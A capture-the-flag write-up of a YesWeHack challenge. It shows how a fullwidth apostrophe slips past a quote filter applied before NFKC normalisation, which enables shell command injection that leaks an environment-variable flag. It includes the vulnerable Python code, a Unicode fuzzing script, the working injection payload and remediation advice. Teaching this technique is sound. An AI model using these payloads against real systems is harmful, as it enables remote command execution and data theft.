Unicode Normalization to Command Injection RCE - YesWeHack 10-25: Ghost Whisper
TL;DR
- User input is embedded into a shell command using single quotes.
- ASCII quotes are filtered before Unicode normalisation.
- A fullwidth apostrophe normalises to
'under NFKC, bypassing the filter. - Quote injection breaks out of the string, enabling command execution and flag leakage.
Description
A mysterious website lets you whisper to ghosts. But can you shatter the veil of silence and make your own voice heard?
Solution
In this writeup, we'll review the latest YesWeHack Dojo challenge, created by Brumens 🎃
Follow me on Twitter and LinkedIn (and everywhere else 🔪) for more hacking content! 🥰
Source code review
setup.py
import os
os.chdir('tmp')
os.mkdir('templates')
os.environ["FLAG"] = flag
with open('templates/index.html', 'w') as f:
f.write('''
<!DOCTYPE html>
<html lang="en">
SNIPPED
</html>
'''.strip())
After snipping the HTML, there isn't much code left in the setup script. We know the flag is in an environment variable and the app uses templates, maybe SSTI?
app.py
import os, Unicodedata
from urllib.parse import unquote
from jinja2 import Environment, FileSystemLoader
template = Environment(
autoescape=True,
loader=FileSystemLoader('/tmp/templates'),
).get_template('index.html')
os.chdir('/tmp')
def main():
whisperMsg = unquote("OUR_INPUT")
# Normalize dangerous characters
whisperMsg = Unicodedata.normalize("NFKC", whisperMsg.replace("'", "_"))
# Run a command and capture its output
with os.popen(f"echo -n '{whisperMsg}' | hexdump") as stream:
hextext = f"{stream.read()} | {whisperMsg}"
print( template.render(msg=whisperMsg, hextext=hextext) )
main()
- All single quotes (
') in our input are replaced with underscores (_) - Input is normalised using "NFKC" normalisation*
- Input is inserted into an
echocommand, which is piped tohexdump - Input and [hex-converted] output of the command are rendered as a template
*NFKC (compatibility fold + canonical compose) collapses many visually-similar/codepoint-distinct characters (full-width forms, ligatures, some superscripts etc) into a standardised form. Sometimes Unicode normalisation can result in overflows/truncation, leading to useful character injections 👀
Testing functionality
How cute is that ghost?! 👻 Let's start by entering a random string as an input 😺

We'll see the hex output from the command is printed alongside the normalised message (separated by a |)
0000000 656d 776f 0000004 | meow
Unhex those characters. We'll find our original input. It's jumbled because hexdump prints 16-bit words by default, and reverses each pair on little endian systems.
unhex 656d776f
emwo
Let's make a short script to explore further.
import os
import Unicodedata
whisperMsg = input()
whisperMsg = Unicodedata.normalize("NFKC", whisperMsg.replace("'", "_"))
with os.popen(f"echo -n '{whisperMsg}' | hexdump") as stream:
hextext = f"{stream.read()} | {whisperMsg}"
print(hextext)
We'll see that submitting 'meow' will trigger the replacement resulting in _meow_. This is important because if we wanted to inject into the command, we would want to close off the existing quote.
python test.py
'meow'
0000000 6d5f 6f65 5f77
0000006
| _meow_
Command Injection
If we can perform command injection, decoding the hexdump output will be trivial. Unfortunately, the developer used single quotes:
echo -n '$(whoami)'
$(whoami)
Instead of double quotes:
echo -n "$(whoami)"
crystal
Yep, our input is treated as literal string. We need to find a way to inject a single quote.
export FLAG=solved
We need to be careful not to break the command syntax, try and input: meow' $FLAG '
echo -n 'meow' $FLAG '' | hexdump
0000000 656d 776f 7320 6c6f 6576 2064
000000c
It works, we could even comment out the hexdump part with meow' $FLAG '' #
echo -n 'meow' $FLAG '' # | hexdump
meow solved
We have confirmed the command injection is easy to exploit, now we need to bypass the filter.
Unicode Overflow
Unicode codepoint truncation - also called a Unicode overflow attack - happens when a server tries to store a Unicode character in a single byte. Because the maximum value of a byte is 255, an overflow can be crafted to produce a specific ASCII character.
Portswigger: Bypassing character blocklists with Unicode overflowsShazzer: Unicode table
In other words; maybe we can find a Unicode character which truncates to a single quote when normalised with NFKC 🤔 Here's a quick fuzzing script:
import Unicodedata
for cp in range(0x110000):
c = chr(cp)
norm = Unicodedata.normalize("NFKC", c)
if cp in (0x27, 0x22):
continue
if "'" in norm or '"' in norm:
try:
name = Unicodedata.name(c)
except ValueError:
name = "<no name>"
print(f"U+{cp:04X}\t{name}\t{c}\t->\t{norm!r}")
It finds a single quote Unicode character that looks just like the ASCII version to the untrained eye.
python uni_test.py
U+FF02 FULLWIDTH QUOTATION MARK " -> '"'
U+FF07 FULLWIDTH APOSTROPHE ' -> "'"
We can easily test this by converting to hex. Normal quote:
hex \'
27
Unicode quote:
hex '
efbc87
We will supply the payload: meow' $FLAG '' #
python test.py
meow' $FLAG '' #
meow solved | meow' $FLAG '' #
It works 🙏 Now to repeat it against the real challenge.

Flag: FLAG{Gh0s7_S4y_BOOO000oooo}
Remediation
- Call commands without shell (swap
os.popenwithsubprocess.run) so user input can't break out or inject new commands - Specify allowed characters instead of filtering bad characters
- Perform validation checks after processing (normalisation)
Summary (TLDR)
This was a cute Halloween challenge featuring a basic command injection vulnerability 🎃 Things were complicated slightly by the presence of a filter which restricted the use of the single quote characters needed to escape the string 👻 Luckily for us the NFKC normalisation step introduced a second vulnerability; a Unicode overflow 🦇 Since the character validation occurred before the normalisation, sending a specially crafted Unicode character was sufficient to bypass the filter 😱